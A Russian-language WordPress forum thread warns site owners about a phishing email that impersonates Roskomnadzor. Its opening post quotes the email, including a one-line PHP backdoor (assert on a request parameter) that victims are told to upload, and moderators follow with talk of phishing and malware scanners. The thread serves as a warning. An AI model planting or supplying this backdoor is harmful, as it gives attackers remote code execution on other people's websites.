• Добрый день!

    Сегодня участились случаи взлома сайтов пользователей.

    На контактный email домена приходят сообщения под видом письма от Роскомнадзора с просьбой разместить у себя файл reestr/reestr-id128032.php, содержащий в себе вредоносный код.

    После размещения данного файла злоумышленники могут получить доступ к данным Вашего сайта.

    Содержание мошеннического письма (вместо многоточия в тексте письма имя Вашего домена):

    » Вы получили данное уведомление от Федеральной службы по надзору в сфере связи,
    информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором
    доменного имени … в сети «Интернет».
    В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон «Об информации, информационных технологиях и о защите информации» и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт … был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

    Для идентификации Вас, как администратора доменного имени … , Вам необходимо:
    1. Cоздать в корневой директории Вашего сайта папку reestr
    2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:
    < ?php
    assert(stripslashes($_REQUEST[roskomnadzor]));
    ?>
    *В < ?php необходимо убрать пробел между < и ?php
    Путь до файла на Вашем сайте должен получиться следующий: …/reestr/reestr-id128032.php

    Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени …, следую инструкции указанной выше, то Ваш сайт … будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации «

    Только что получил письмо от хостера, будьте бдительны!

Просмотр 15 ответов — с 1 по 15 (всего 16)
  • Модератор Yui

    (@fierevere)

    永子

    уже было на хабре, http://habrahabr.ru/post/265515/
    мне сразу не нравится что письмо от .ORG
    и вообще зачем вестись на такое ? 😀

    Модератор Юрій

    (@yube)

    и вообще зачем вестись на такое ? 😀

    [почти оффтоп]
    В бухгалтерию одной довольно солидной инвестиционной компании пришло письмо с примерно таким текстом «Сохраните вложенный файл в папку c:\windows\system32» и подписью «Теподдержка Микрософт». Угадайте с одного раза, чем дело кончилось.

    Модератор Yui

    (@fierevere)

    永子

    чем дело кончилось.

    ну что еще сказать… https://www.youtube.com/watch?v=X41b-iMrerI

    а ведь именно так половина людей затаскивает себе на сайт вирусы и прочую хрень. сами и своими собственными руками.

    уже было на хабре, http://habrahabr.ru/post/265515/
    мне сразу не нравится что письмо от .ORG
    и вообще зачем вестись на такое ? 😀

    Далеко не все сидят на хабре.
    Начинающие часто совершают ошибки такого рода…

    начинающие на этом форуме читают только свои топики и подобные предупреждения до них не доходят. да и толку писать о таком — фишинг популярен и разводят тысячью разными способами.

    куда эффективнее якобы письма от хостеров с якобы предупреждениями о нагрузке и возможном отключении сайта — на это ведутся куда как сильнее.

    Модератор Yui

    (@fierevere)

    永子

    а еще тут плохой поиск, тема уплывет вниз и ее мало кто из целевой аудитории увидит…
    только те, кто как мы следят за rss форума

    Согласен с вашими утверждениями.
    Ну была не была, может кому то и будет полезна эта информацию, если не сейчас то на будущее.

    А вы пользуетесь утилитой Айболит? Если кто пользуется, напишите ваше мнение о нем. Стоит не стоит её пользоваться?

    P.S извините что не по теме.

    Модератор Yui

    (@fierevere)

    永子

    если есть причина — стоит, если конечно правильно интерпретировать результат

    еще есть

    яндекс manul

    у него тот же автор что и у айболита + люди с яндекса

    Модератор Юрій

    (@yube)

    Я пользуюсь Айболитом при чистке чужих сайтов. На своих предпочитаю мониторить изменения файлов.

    Модератор Yui

    (@fierevere)

    永子

    Юрий, самописные скрипты или какое-то готовое решение?

    Модератор Yui

    (@fierevere)

    永子

    Модератор Юрій

    (@yube)

    Готовое самописное 🙂 http://blog.portal.kharkov.ua/2012/04/04/files-monito/

    Где есть возможность, там на уровне системы (find, md5sum), где нет — плагин. А где нет WP, там ftpinfo (слава богу, таких давно нет).

    Модератор Юрій

    (@yube)

    p.s. Есть более свежая версия плагина, но я ее не выкладывал и пока не собираюсь 😉

Просмотр 15 ответов — с 1 по 15 (всего 16)
  • Тема «БУДЬТЕ ОСТОРОЖНЫ» закрыта для новых ответов.